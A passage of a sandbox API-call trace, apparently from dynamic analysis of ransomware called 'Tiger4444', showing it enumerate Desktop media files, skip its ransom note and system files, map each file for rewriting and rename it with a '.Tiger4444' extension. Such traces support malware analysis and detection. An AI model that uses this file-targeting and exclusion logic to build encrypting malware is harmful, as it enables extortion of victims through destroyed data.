dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DzblCW7scjQqRQVoIM.mkv", cAlternateFileName="DZBLCW~1.MKV")) returned 1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="Tiger4444.exe") returned -1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2=".") returned 1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="..") returned 1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="windows") returned -1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="bootmgr") returned 1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="pagefile.sys") returned -1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="boot") returned 1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="ids.txt") returned -1 [0049.505] lstrcmpiW (lpString1="DzblCW7scjQqRQVoIM.mkv", lpString2="NTUSER.DAT") returned -1 [0049.505] lstrcpyW (in: lpString1=0x30aead8, lpString2="DzblCW7scjQqRQVoIM.mkv" | out: lpString1="DzblCW7scjQqRQVoIM.mkv") returned="DzblCW7scjQqRQVoIM.mkv" [0049.505] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DzblCW7scjQqRQVoIM.mkv", dwFileAttributes=0x0) returned 1 [0049.505] lstrlenW (lpString="DzblCW7scjQqRQVoIM.mkv") returned 22 [0049.505] lstrlenW (lpString="Tiger4444") returned 9 [0049.505] lstrcmpiW (lpString1="QVoIM.mkv", lpString2="Tiger4444") returned -1 [0049.505] lstrlenW (lpString=".dll") returned 4 [0049.505] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0049.505] lstrlenW (lpString=".lnk") returned 4 [0049.505] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0049.505] lstrlenW (lpString=".ini") returned 4 [0049.505] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0049.505] lstrlenW (lpString=".sys") returned 4 [0049.505] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0049.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DzblCW7scjQqRQVoIM.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\dzblcw7scjqqrqvoim.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.506] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.506] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14095866450) returned 1 [0049.506] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=91605) returned 1 [0049.506] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0049.506] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0049.506] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x168e0, lpName=0x0) returned 0x2c8 [0049.506] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168e0) returned 0xbe0000 [0049.508] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.508] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.508] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.508] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.508] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.508] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.508] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.508] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.508] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14096154653) returned 1 [0049.508] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0049.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0049.509] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.509] CloseHandle (hObject=0x2c8) returned 1 [0049.509] CloseHandle (hObject=0x260) returned 1 [0049.513] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\DzblCW7scjQqRQVoIM.mkv.Tiger4444") returned 56 [0049.513] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\DzblCW7scjQqRQVoIM.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\dzblcw7scjqqrqvoim.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\DzblCW7scjQqRQVoIM.mkv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\dzblcw7scjqqrqvoim.mkv.tiger4444"), dwFlags=0x1) returned 1 [0049.522] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50d9a810, ftCreationTime.dwHighDateTime=0x1d4cf72, ftLastAccessTime.dwLowDateTime=0xc2bea100, ftLastAccessTime.dwHighDateTime=0x1d4c749, ftLastWriteTime.dwLowDateTime=0xc2bea100, ftLastWriteTime.dwHighDateTime=0x1d4c749, nFileSizeHigh=0x0, nFileSizeLow=0x17c7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h bd3clz1Q5tEHTT.m4a", cAlternateFileName="HBD3CL~1.M4A")) returned 1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="Tiger4444.exe") returned -1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2=".") returned 1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="..") returned 1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="windows") returned -1 [0049.522] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="bootmgr") returned 1 [0049.523] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="pagefile.sys") returned -1 [0049.523] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="boot") returned 1 [0049.523] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="ids.txt") returned -1 [0049.523] lstrcmpiW (lpString1="h bd3clz1Q5tEHTT.m4a", lpString2="NTUSER.DAT") returned -1 [0049.523] lstrcpyW (in: lpString1=0x30aead8, lpString2="h bd3clz1Q5tEHTT.m4a" | out: lpString1="h bd3clz1Q5tEHTT.m4a") returned="h bd3clz1Q5tEHTT.m4a" [0049.523] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\h bd3clz1Q5tEHTT.m4a", dwFileAttributes=0x0) returned 1 [0049.523] lstrlenW (lpString="h bd3clz1Q5tEHTT.m4a") returned 20 [0049.523] lstrlenW (lpString="Tiger4444") returned 9 [0049.523] lstrcmpiW (lpString1="tEHTT.m4a", lpString2="Tiger4444") returned -1 [0049.523] lstrlenW (lpString=".dll") returned 4 [0049.523] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.523] lstrlenW (lpString=".lnk") returned 4 [0049.523] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.523] lstrlenW (lpString=".ini") returned 4 [0049.523] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.523] lstrlenW (lpString=".sys") returned 4 [0049.523] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\h bd3clz1Q5tEHTT.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\h bd3clz1q5tehtt.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.523] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.523] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14097635831) returned 1 [0049.523] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=97406) returned 1 [0049.523] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.523] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0049.523] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17f80, lpName=0x0) returned 0x2c8 [0049.523] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f80) returned 0xbe0000 [0049.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.526] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14097883362) returned 1 [0049.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0049.526] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.528] CloseHandle (hObject=0x2c8) returned 1 [0049.528] CloseHandle (hObject=0x260) returned 1 [0049.529] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\h bd3clz1Q5tEHTT.m4a.Tiger4444") returned 54 [0049.529] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\h bd3clz1Q5tEHTT.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\h bd3clz1q5tehtt.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\h bd3clz1Q5tEHTT.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\h bd3clz1q5tehtt.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.530] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b243b80, ftCreationTime.dwHighDateTime=0x1d4d2b9, ftLastAccessTime.dwLowDateTime=0x54aba860, ftLastAccessTime.dwHighDateTime=0x1d4c803, ftLastWriteTime.dwLowDateTime=0x54aba860, ftLastWriteTime.dwHighDateTime=0x1d4c803, nFileSizeHigh=0x0, nFileSizeLow=0x15e10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h t9MdzqmL.wav", cAlternateFileName="HT9MDZ~1.WAV")) returned 1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="Tiger4444.exe") returned -1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2=".") returned 1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="..") returned 1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="windows") returned -1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="bootmgr") returned 1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="pagefile.sys") returned -1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="boot") returned 1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="ids.txt") returned -1 [0049.530] lstrcmpiW (lpString1="h t9MdzqmL.wav", lpString2="NTUSER.DAT") returned -1 [0049.530] lstrcpyW (in: lpString1=0x30aead8, lpString2="h t9MdzqmL.wav" | out: lpString1="h t9MdzqmL.wav") returned="h t9MdzqmL.wav" [0049.530] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\h t9MdzqmL.wav", dwFileAttributes=0x0) returned 1 [0049.530] lstrlenW (lpString="h t9MdzqmL.wav") returned 14 [0049.530] lstrlenW (lpString="Tiger4444") returned 9 [0049.530] lstrcmpiW (lpString1="dzqmL.wav", lpString2="Tiger4444") returned -1 [0049.530] lstrlenW (lpString=".dll") returned 4 [0049.530] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.530] lstrlenW (lpString=".lnk") returned 4 [0049.530] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.530] lstrlenW (lpString=".ini") returned 4 [0049.530] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.530] lstrlenW (lpString=".sys") returned 4 [0049.530] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\h t9MdzqmL.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\h t9mdzqml.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.530] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.530] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14098358742) returned 1 [0049.531] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=89616) returned 1 [0049.531] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0049.531] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0049.531] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16110, lpName=0x0) returned 0x2c8 [0049.531] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16110) returned 0xbe0000 [0049.533] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.533] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.533] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.533] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.533] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14098630344) returned 1 [0049.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0049.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0049.533] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.534] CloseHandle (hObject=0x2c8) returned 1 [0049.534] CloseHandle (hObject=0x260) returned 1 [0049.535] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\h t9MdzqmL.wav.Tiger4444") returned 48 [0049.535] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\h t9MdzqmL.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\h t9mdzqml.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\h t9MdzqmL.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\h t9mdzqml.wav.tiger4444"), dwFlags=0x1) returned 1 [0049.535] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd52beb70, ftCreationTime.dwHighDateTime=0x1d4d27c, ftLastAccessTime.dwLowDateTime=0xf21c6ea0, ftLastAccessTime.dwHighDateTime=0x1d4d324, ftLastWriteTime.dwLowDateTime=0xf21c6ea0, ftLastWriteTime.dwHighDateTime=0x1d4d324, nFileSizeHigh=0x0, nFileSizeLow=0x5757, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzeE96S9vKSRPUEY6BcL.jpg", cAlternateFileName="HZEE96~1.JPG")) returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="Tiger4444.exe") returned -1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2=".") returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="..") returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="windows") returned -1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="bootmgr") returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="pagefile.sys") returned -1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="boot") returned 1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="ids.txt") returned -1 [0049.535] lstrcmpiW (lpString1="hzeE96S9vKSRPUEY6BcL.jpg", lpString2="NTUSER.DAT") returned -1 [0049.535] lstrcpyW (in: lpString1=0x30aead8, lpString2="hzeE96S9vKSRPUEY6BcL.jpg" | out: lpString1="hzeE96S9vKSRPUEY6BcL.jpg") returned="hzeE96S9vKSRPUEY6BcL.jpg" [0049.535] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hzeE96S9vKSRPUEY6BcL.jpg", dwFileAttributes=0x0) returned 1 [0049.536] lstrlenW (lpString="hzeE96S9vKSRPUEY6BcL.jpg") returned 24 [0049.536] lstrlenW (lpString="Tiger4444") returned 9 [0049.536] lstrcmpiW (lpString1="Y6BcL.jpg", lpString2="Tiger4444") returned 1 [0049.536] lstrlenW (lpString=".dll") returned 4 [0049.536] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.536] lstrlenW (lpString=".lnk") returned 4 [0049.536] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0049.536] lstrlenW (lpString=".ini") returned 4 [0049.536] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0049.536] lstrlenW (lpString=".sys") returned 4 [0049.536] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0049.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hzeE96S9vKSRPUEY6BcL.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\hzee96s9vksrpuey6bcl.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.536] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.536] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14098904740) returned 1 [0049.536] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=22359) returned 1 [0049.536] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0049.536] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0049.536] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a60, lpName=0x0) returned 0x2c8 [0049.536] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a60) returned 0xbe0000 [0049.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.537] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14099032778) returned 1 [0049.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0049.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0049.537] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.538] CloseHandle (hObject=0x2c8) returned 1 [0049.538] CloseHandle (hObject=0x260) returned 1 [0049.538] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\hzeE96S9vKSRPUEY6BcL.jpg.Tiger4444") returned 58 [0049.538] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\hzeE96S9vKSRPUEY6BcL.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\hzee96s9vksrpuey6bcl.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\hzeE96S9vKSRPUEY6BcL.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\hzee96s9vksrpuey6bcl.jpg.tiger4444"), dwFlags=0x1) returned 1 [0049.538] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b7866a3, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7b7866a3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80c62844, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x9ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ids.txt", cAlternateFileName="")) returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="Tiger4444.exe") returned -1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2=".") returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="..") returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="windows") returned -1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="bootmgr") returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="pagefile.sys") returned -1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="boot") returned 1 [0049.539] lstrcmpiW (lpString1="ids.txt", lpString2="ids.txt") returned 0 [0049.539] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d1f1f0, ftCreationTime.dwHighDateTime=0x1d4cbf6, ftLastAccessTime.dwLowDateTime=0x221a9980, ftLastAccessTime.dwHighDateTime=0x1d4d0df, ftLastWriteTime.dwLowDateTime=0x221a9980, ftLastWriteTime.dwHighDateTime=0x1d4d0df, nFileSizeHigh=0x0, nFileSizeLow=0x6262, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IeLgYQ3Ib.m4a", cAlternateFileName="IELGYQ~1.M4A")) returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="Tiger4444.exe") returned -1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2=".") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="..") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="windows") returned -1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="bootmgr") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="pagefile.sys") returned -1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="boot") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="ids.txt") returned 1 [0049.539] lstrcmpiW (lpString1="IeLgYQ3Ib.m4a", lpString2="NTUSER.DAT") returned -1 [0049.539] lstrcpyW (in: lpString1=0x30aead8, lpString2="IeLgYQ3Ib.m4a" | out: lpString1="IeLgYQ3Ib.m4a") returned="IeLgYQ3Ib.m4a" [0049.539] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\IeLgYQ3Ib.m4a", dwFileAttributes=0x0) returned 1 [0049.539] 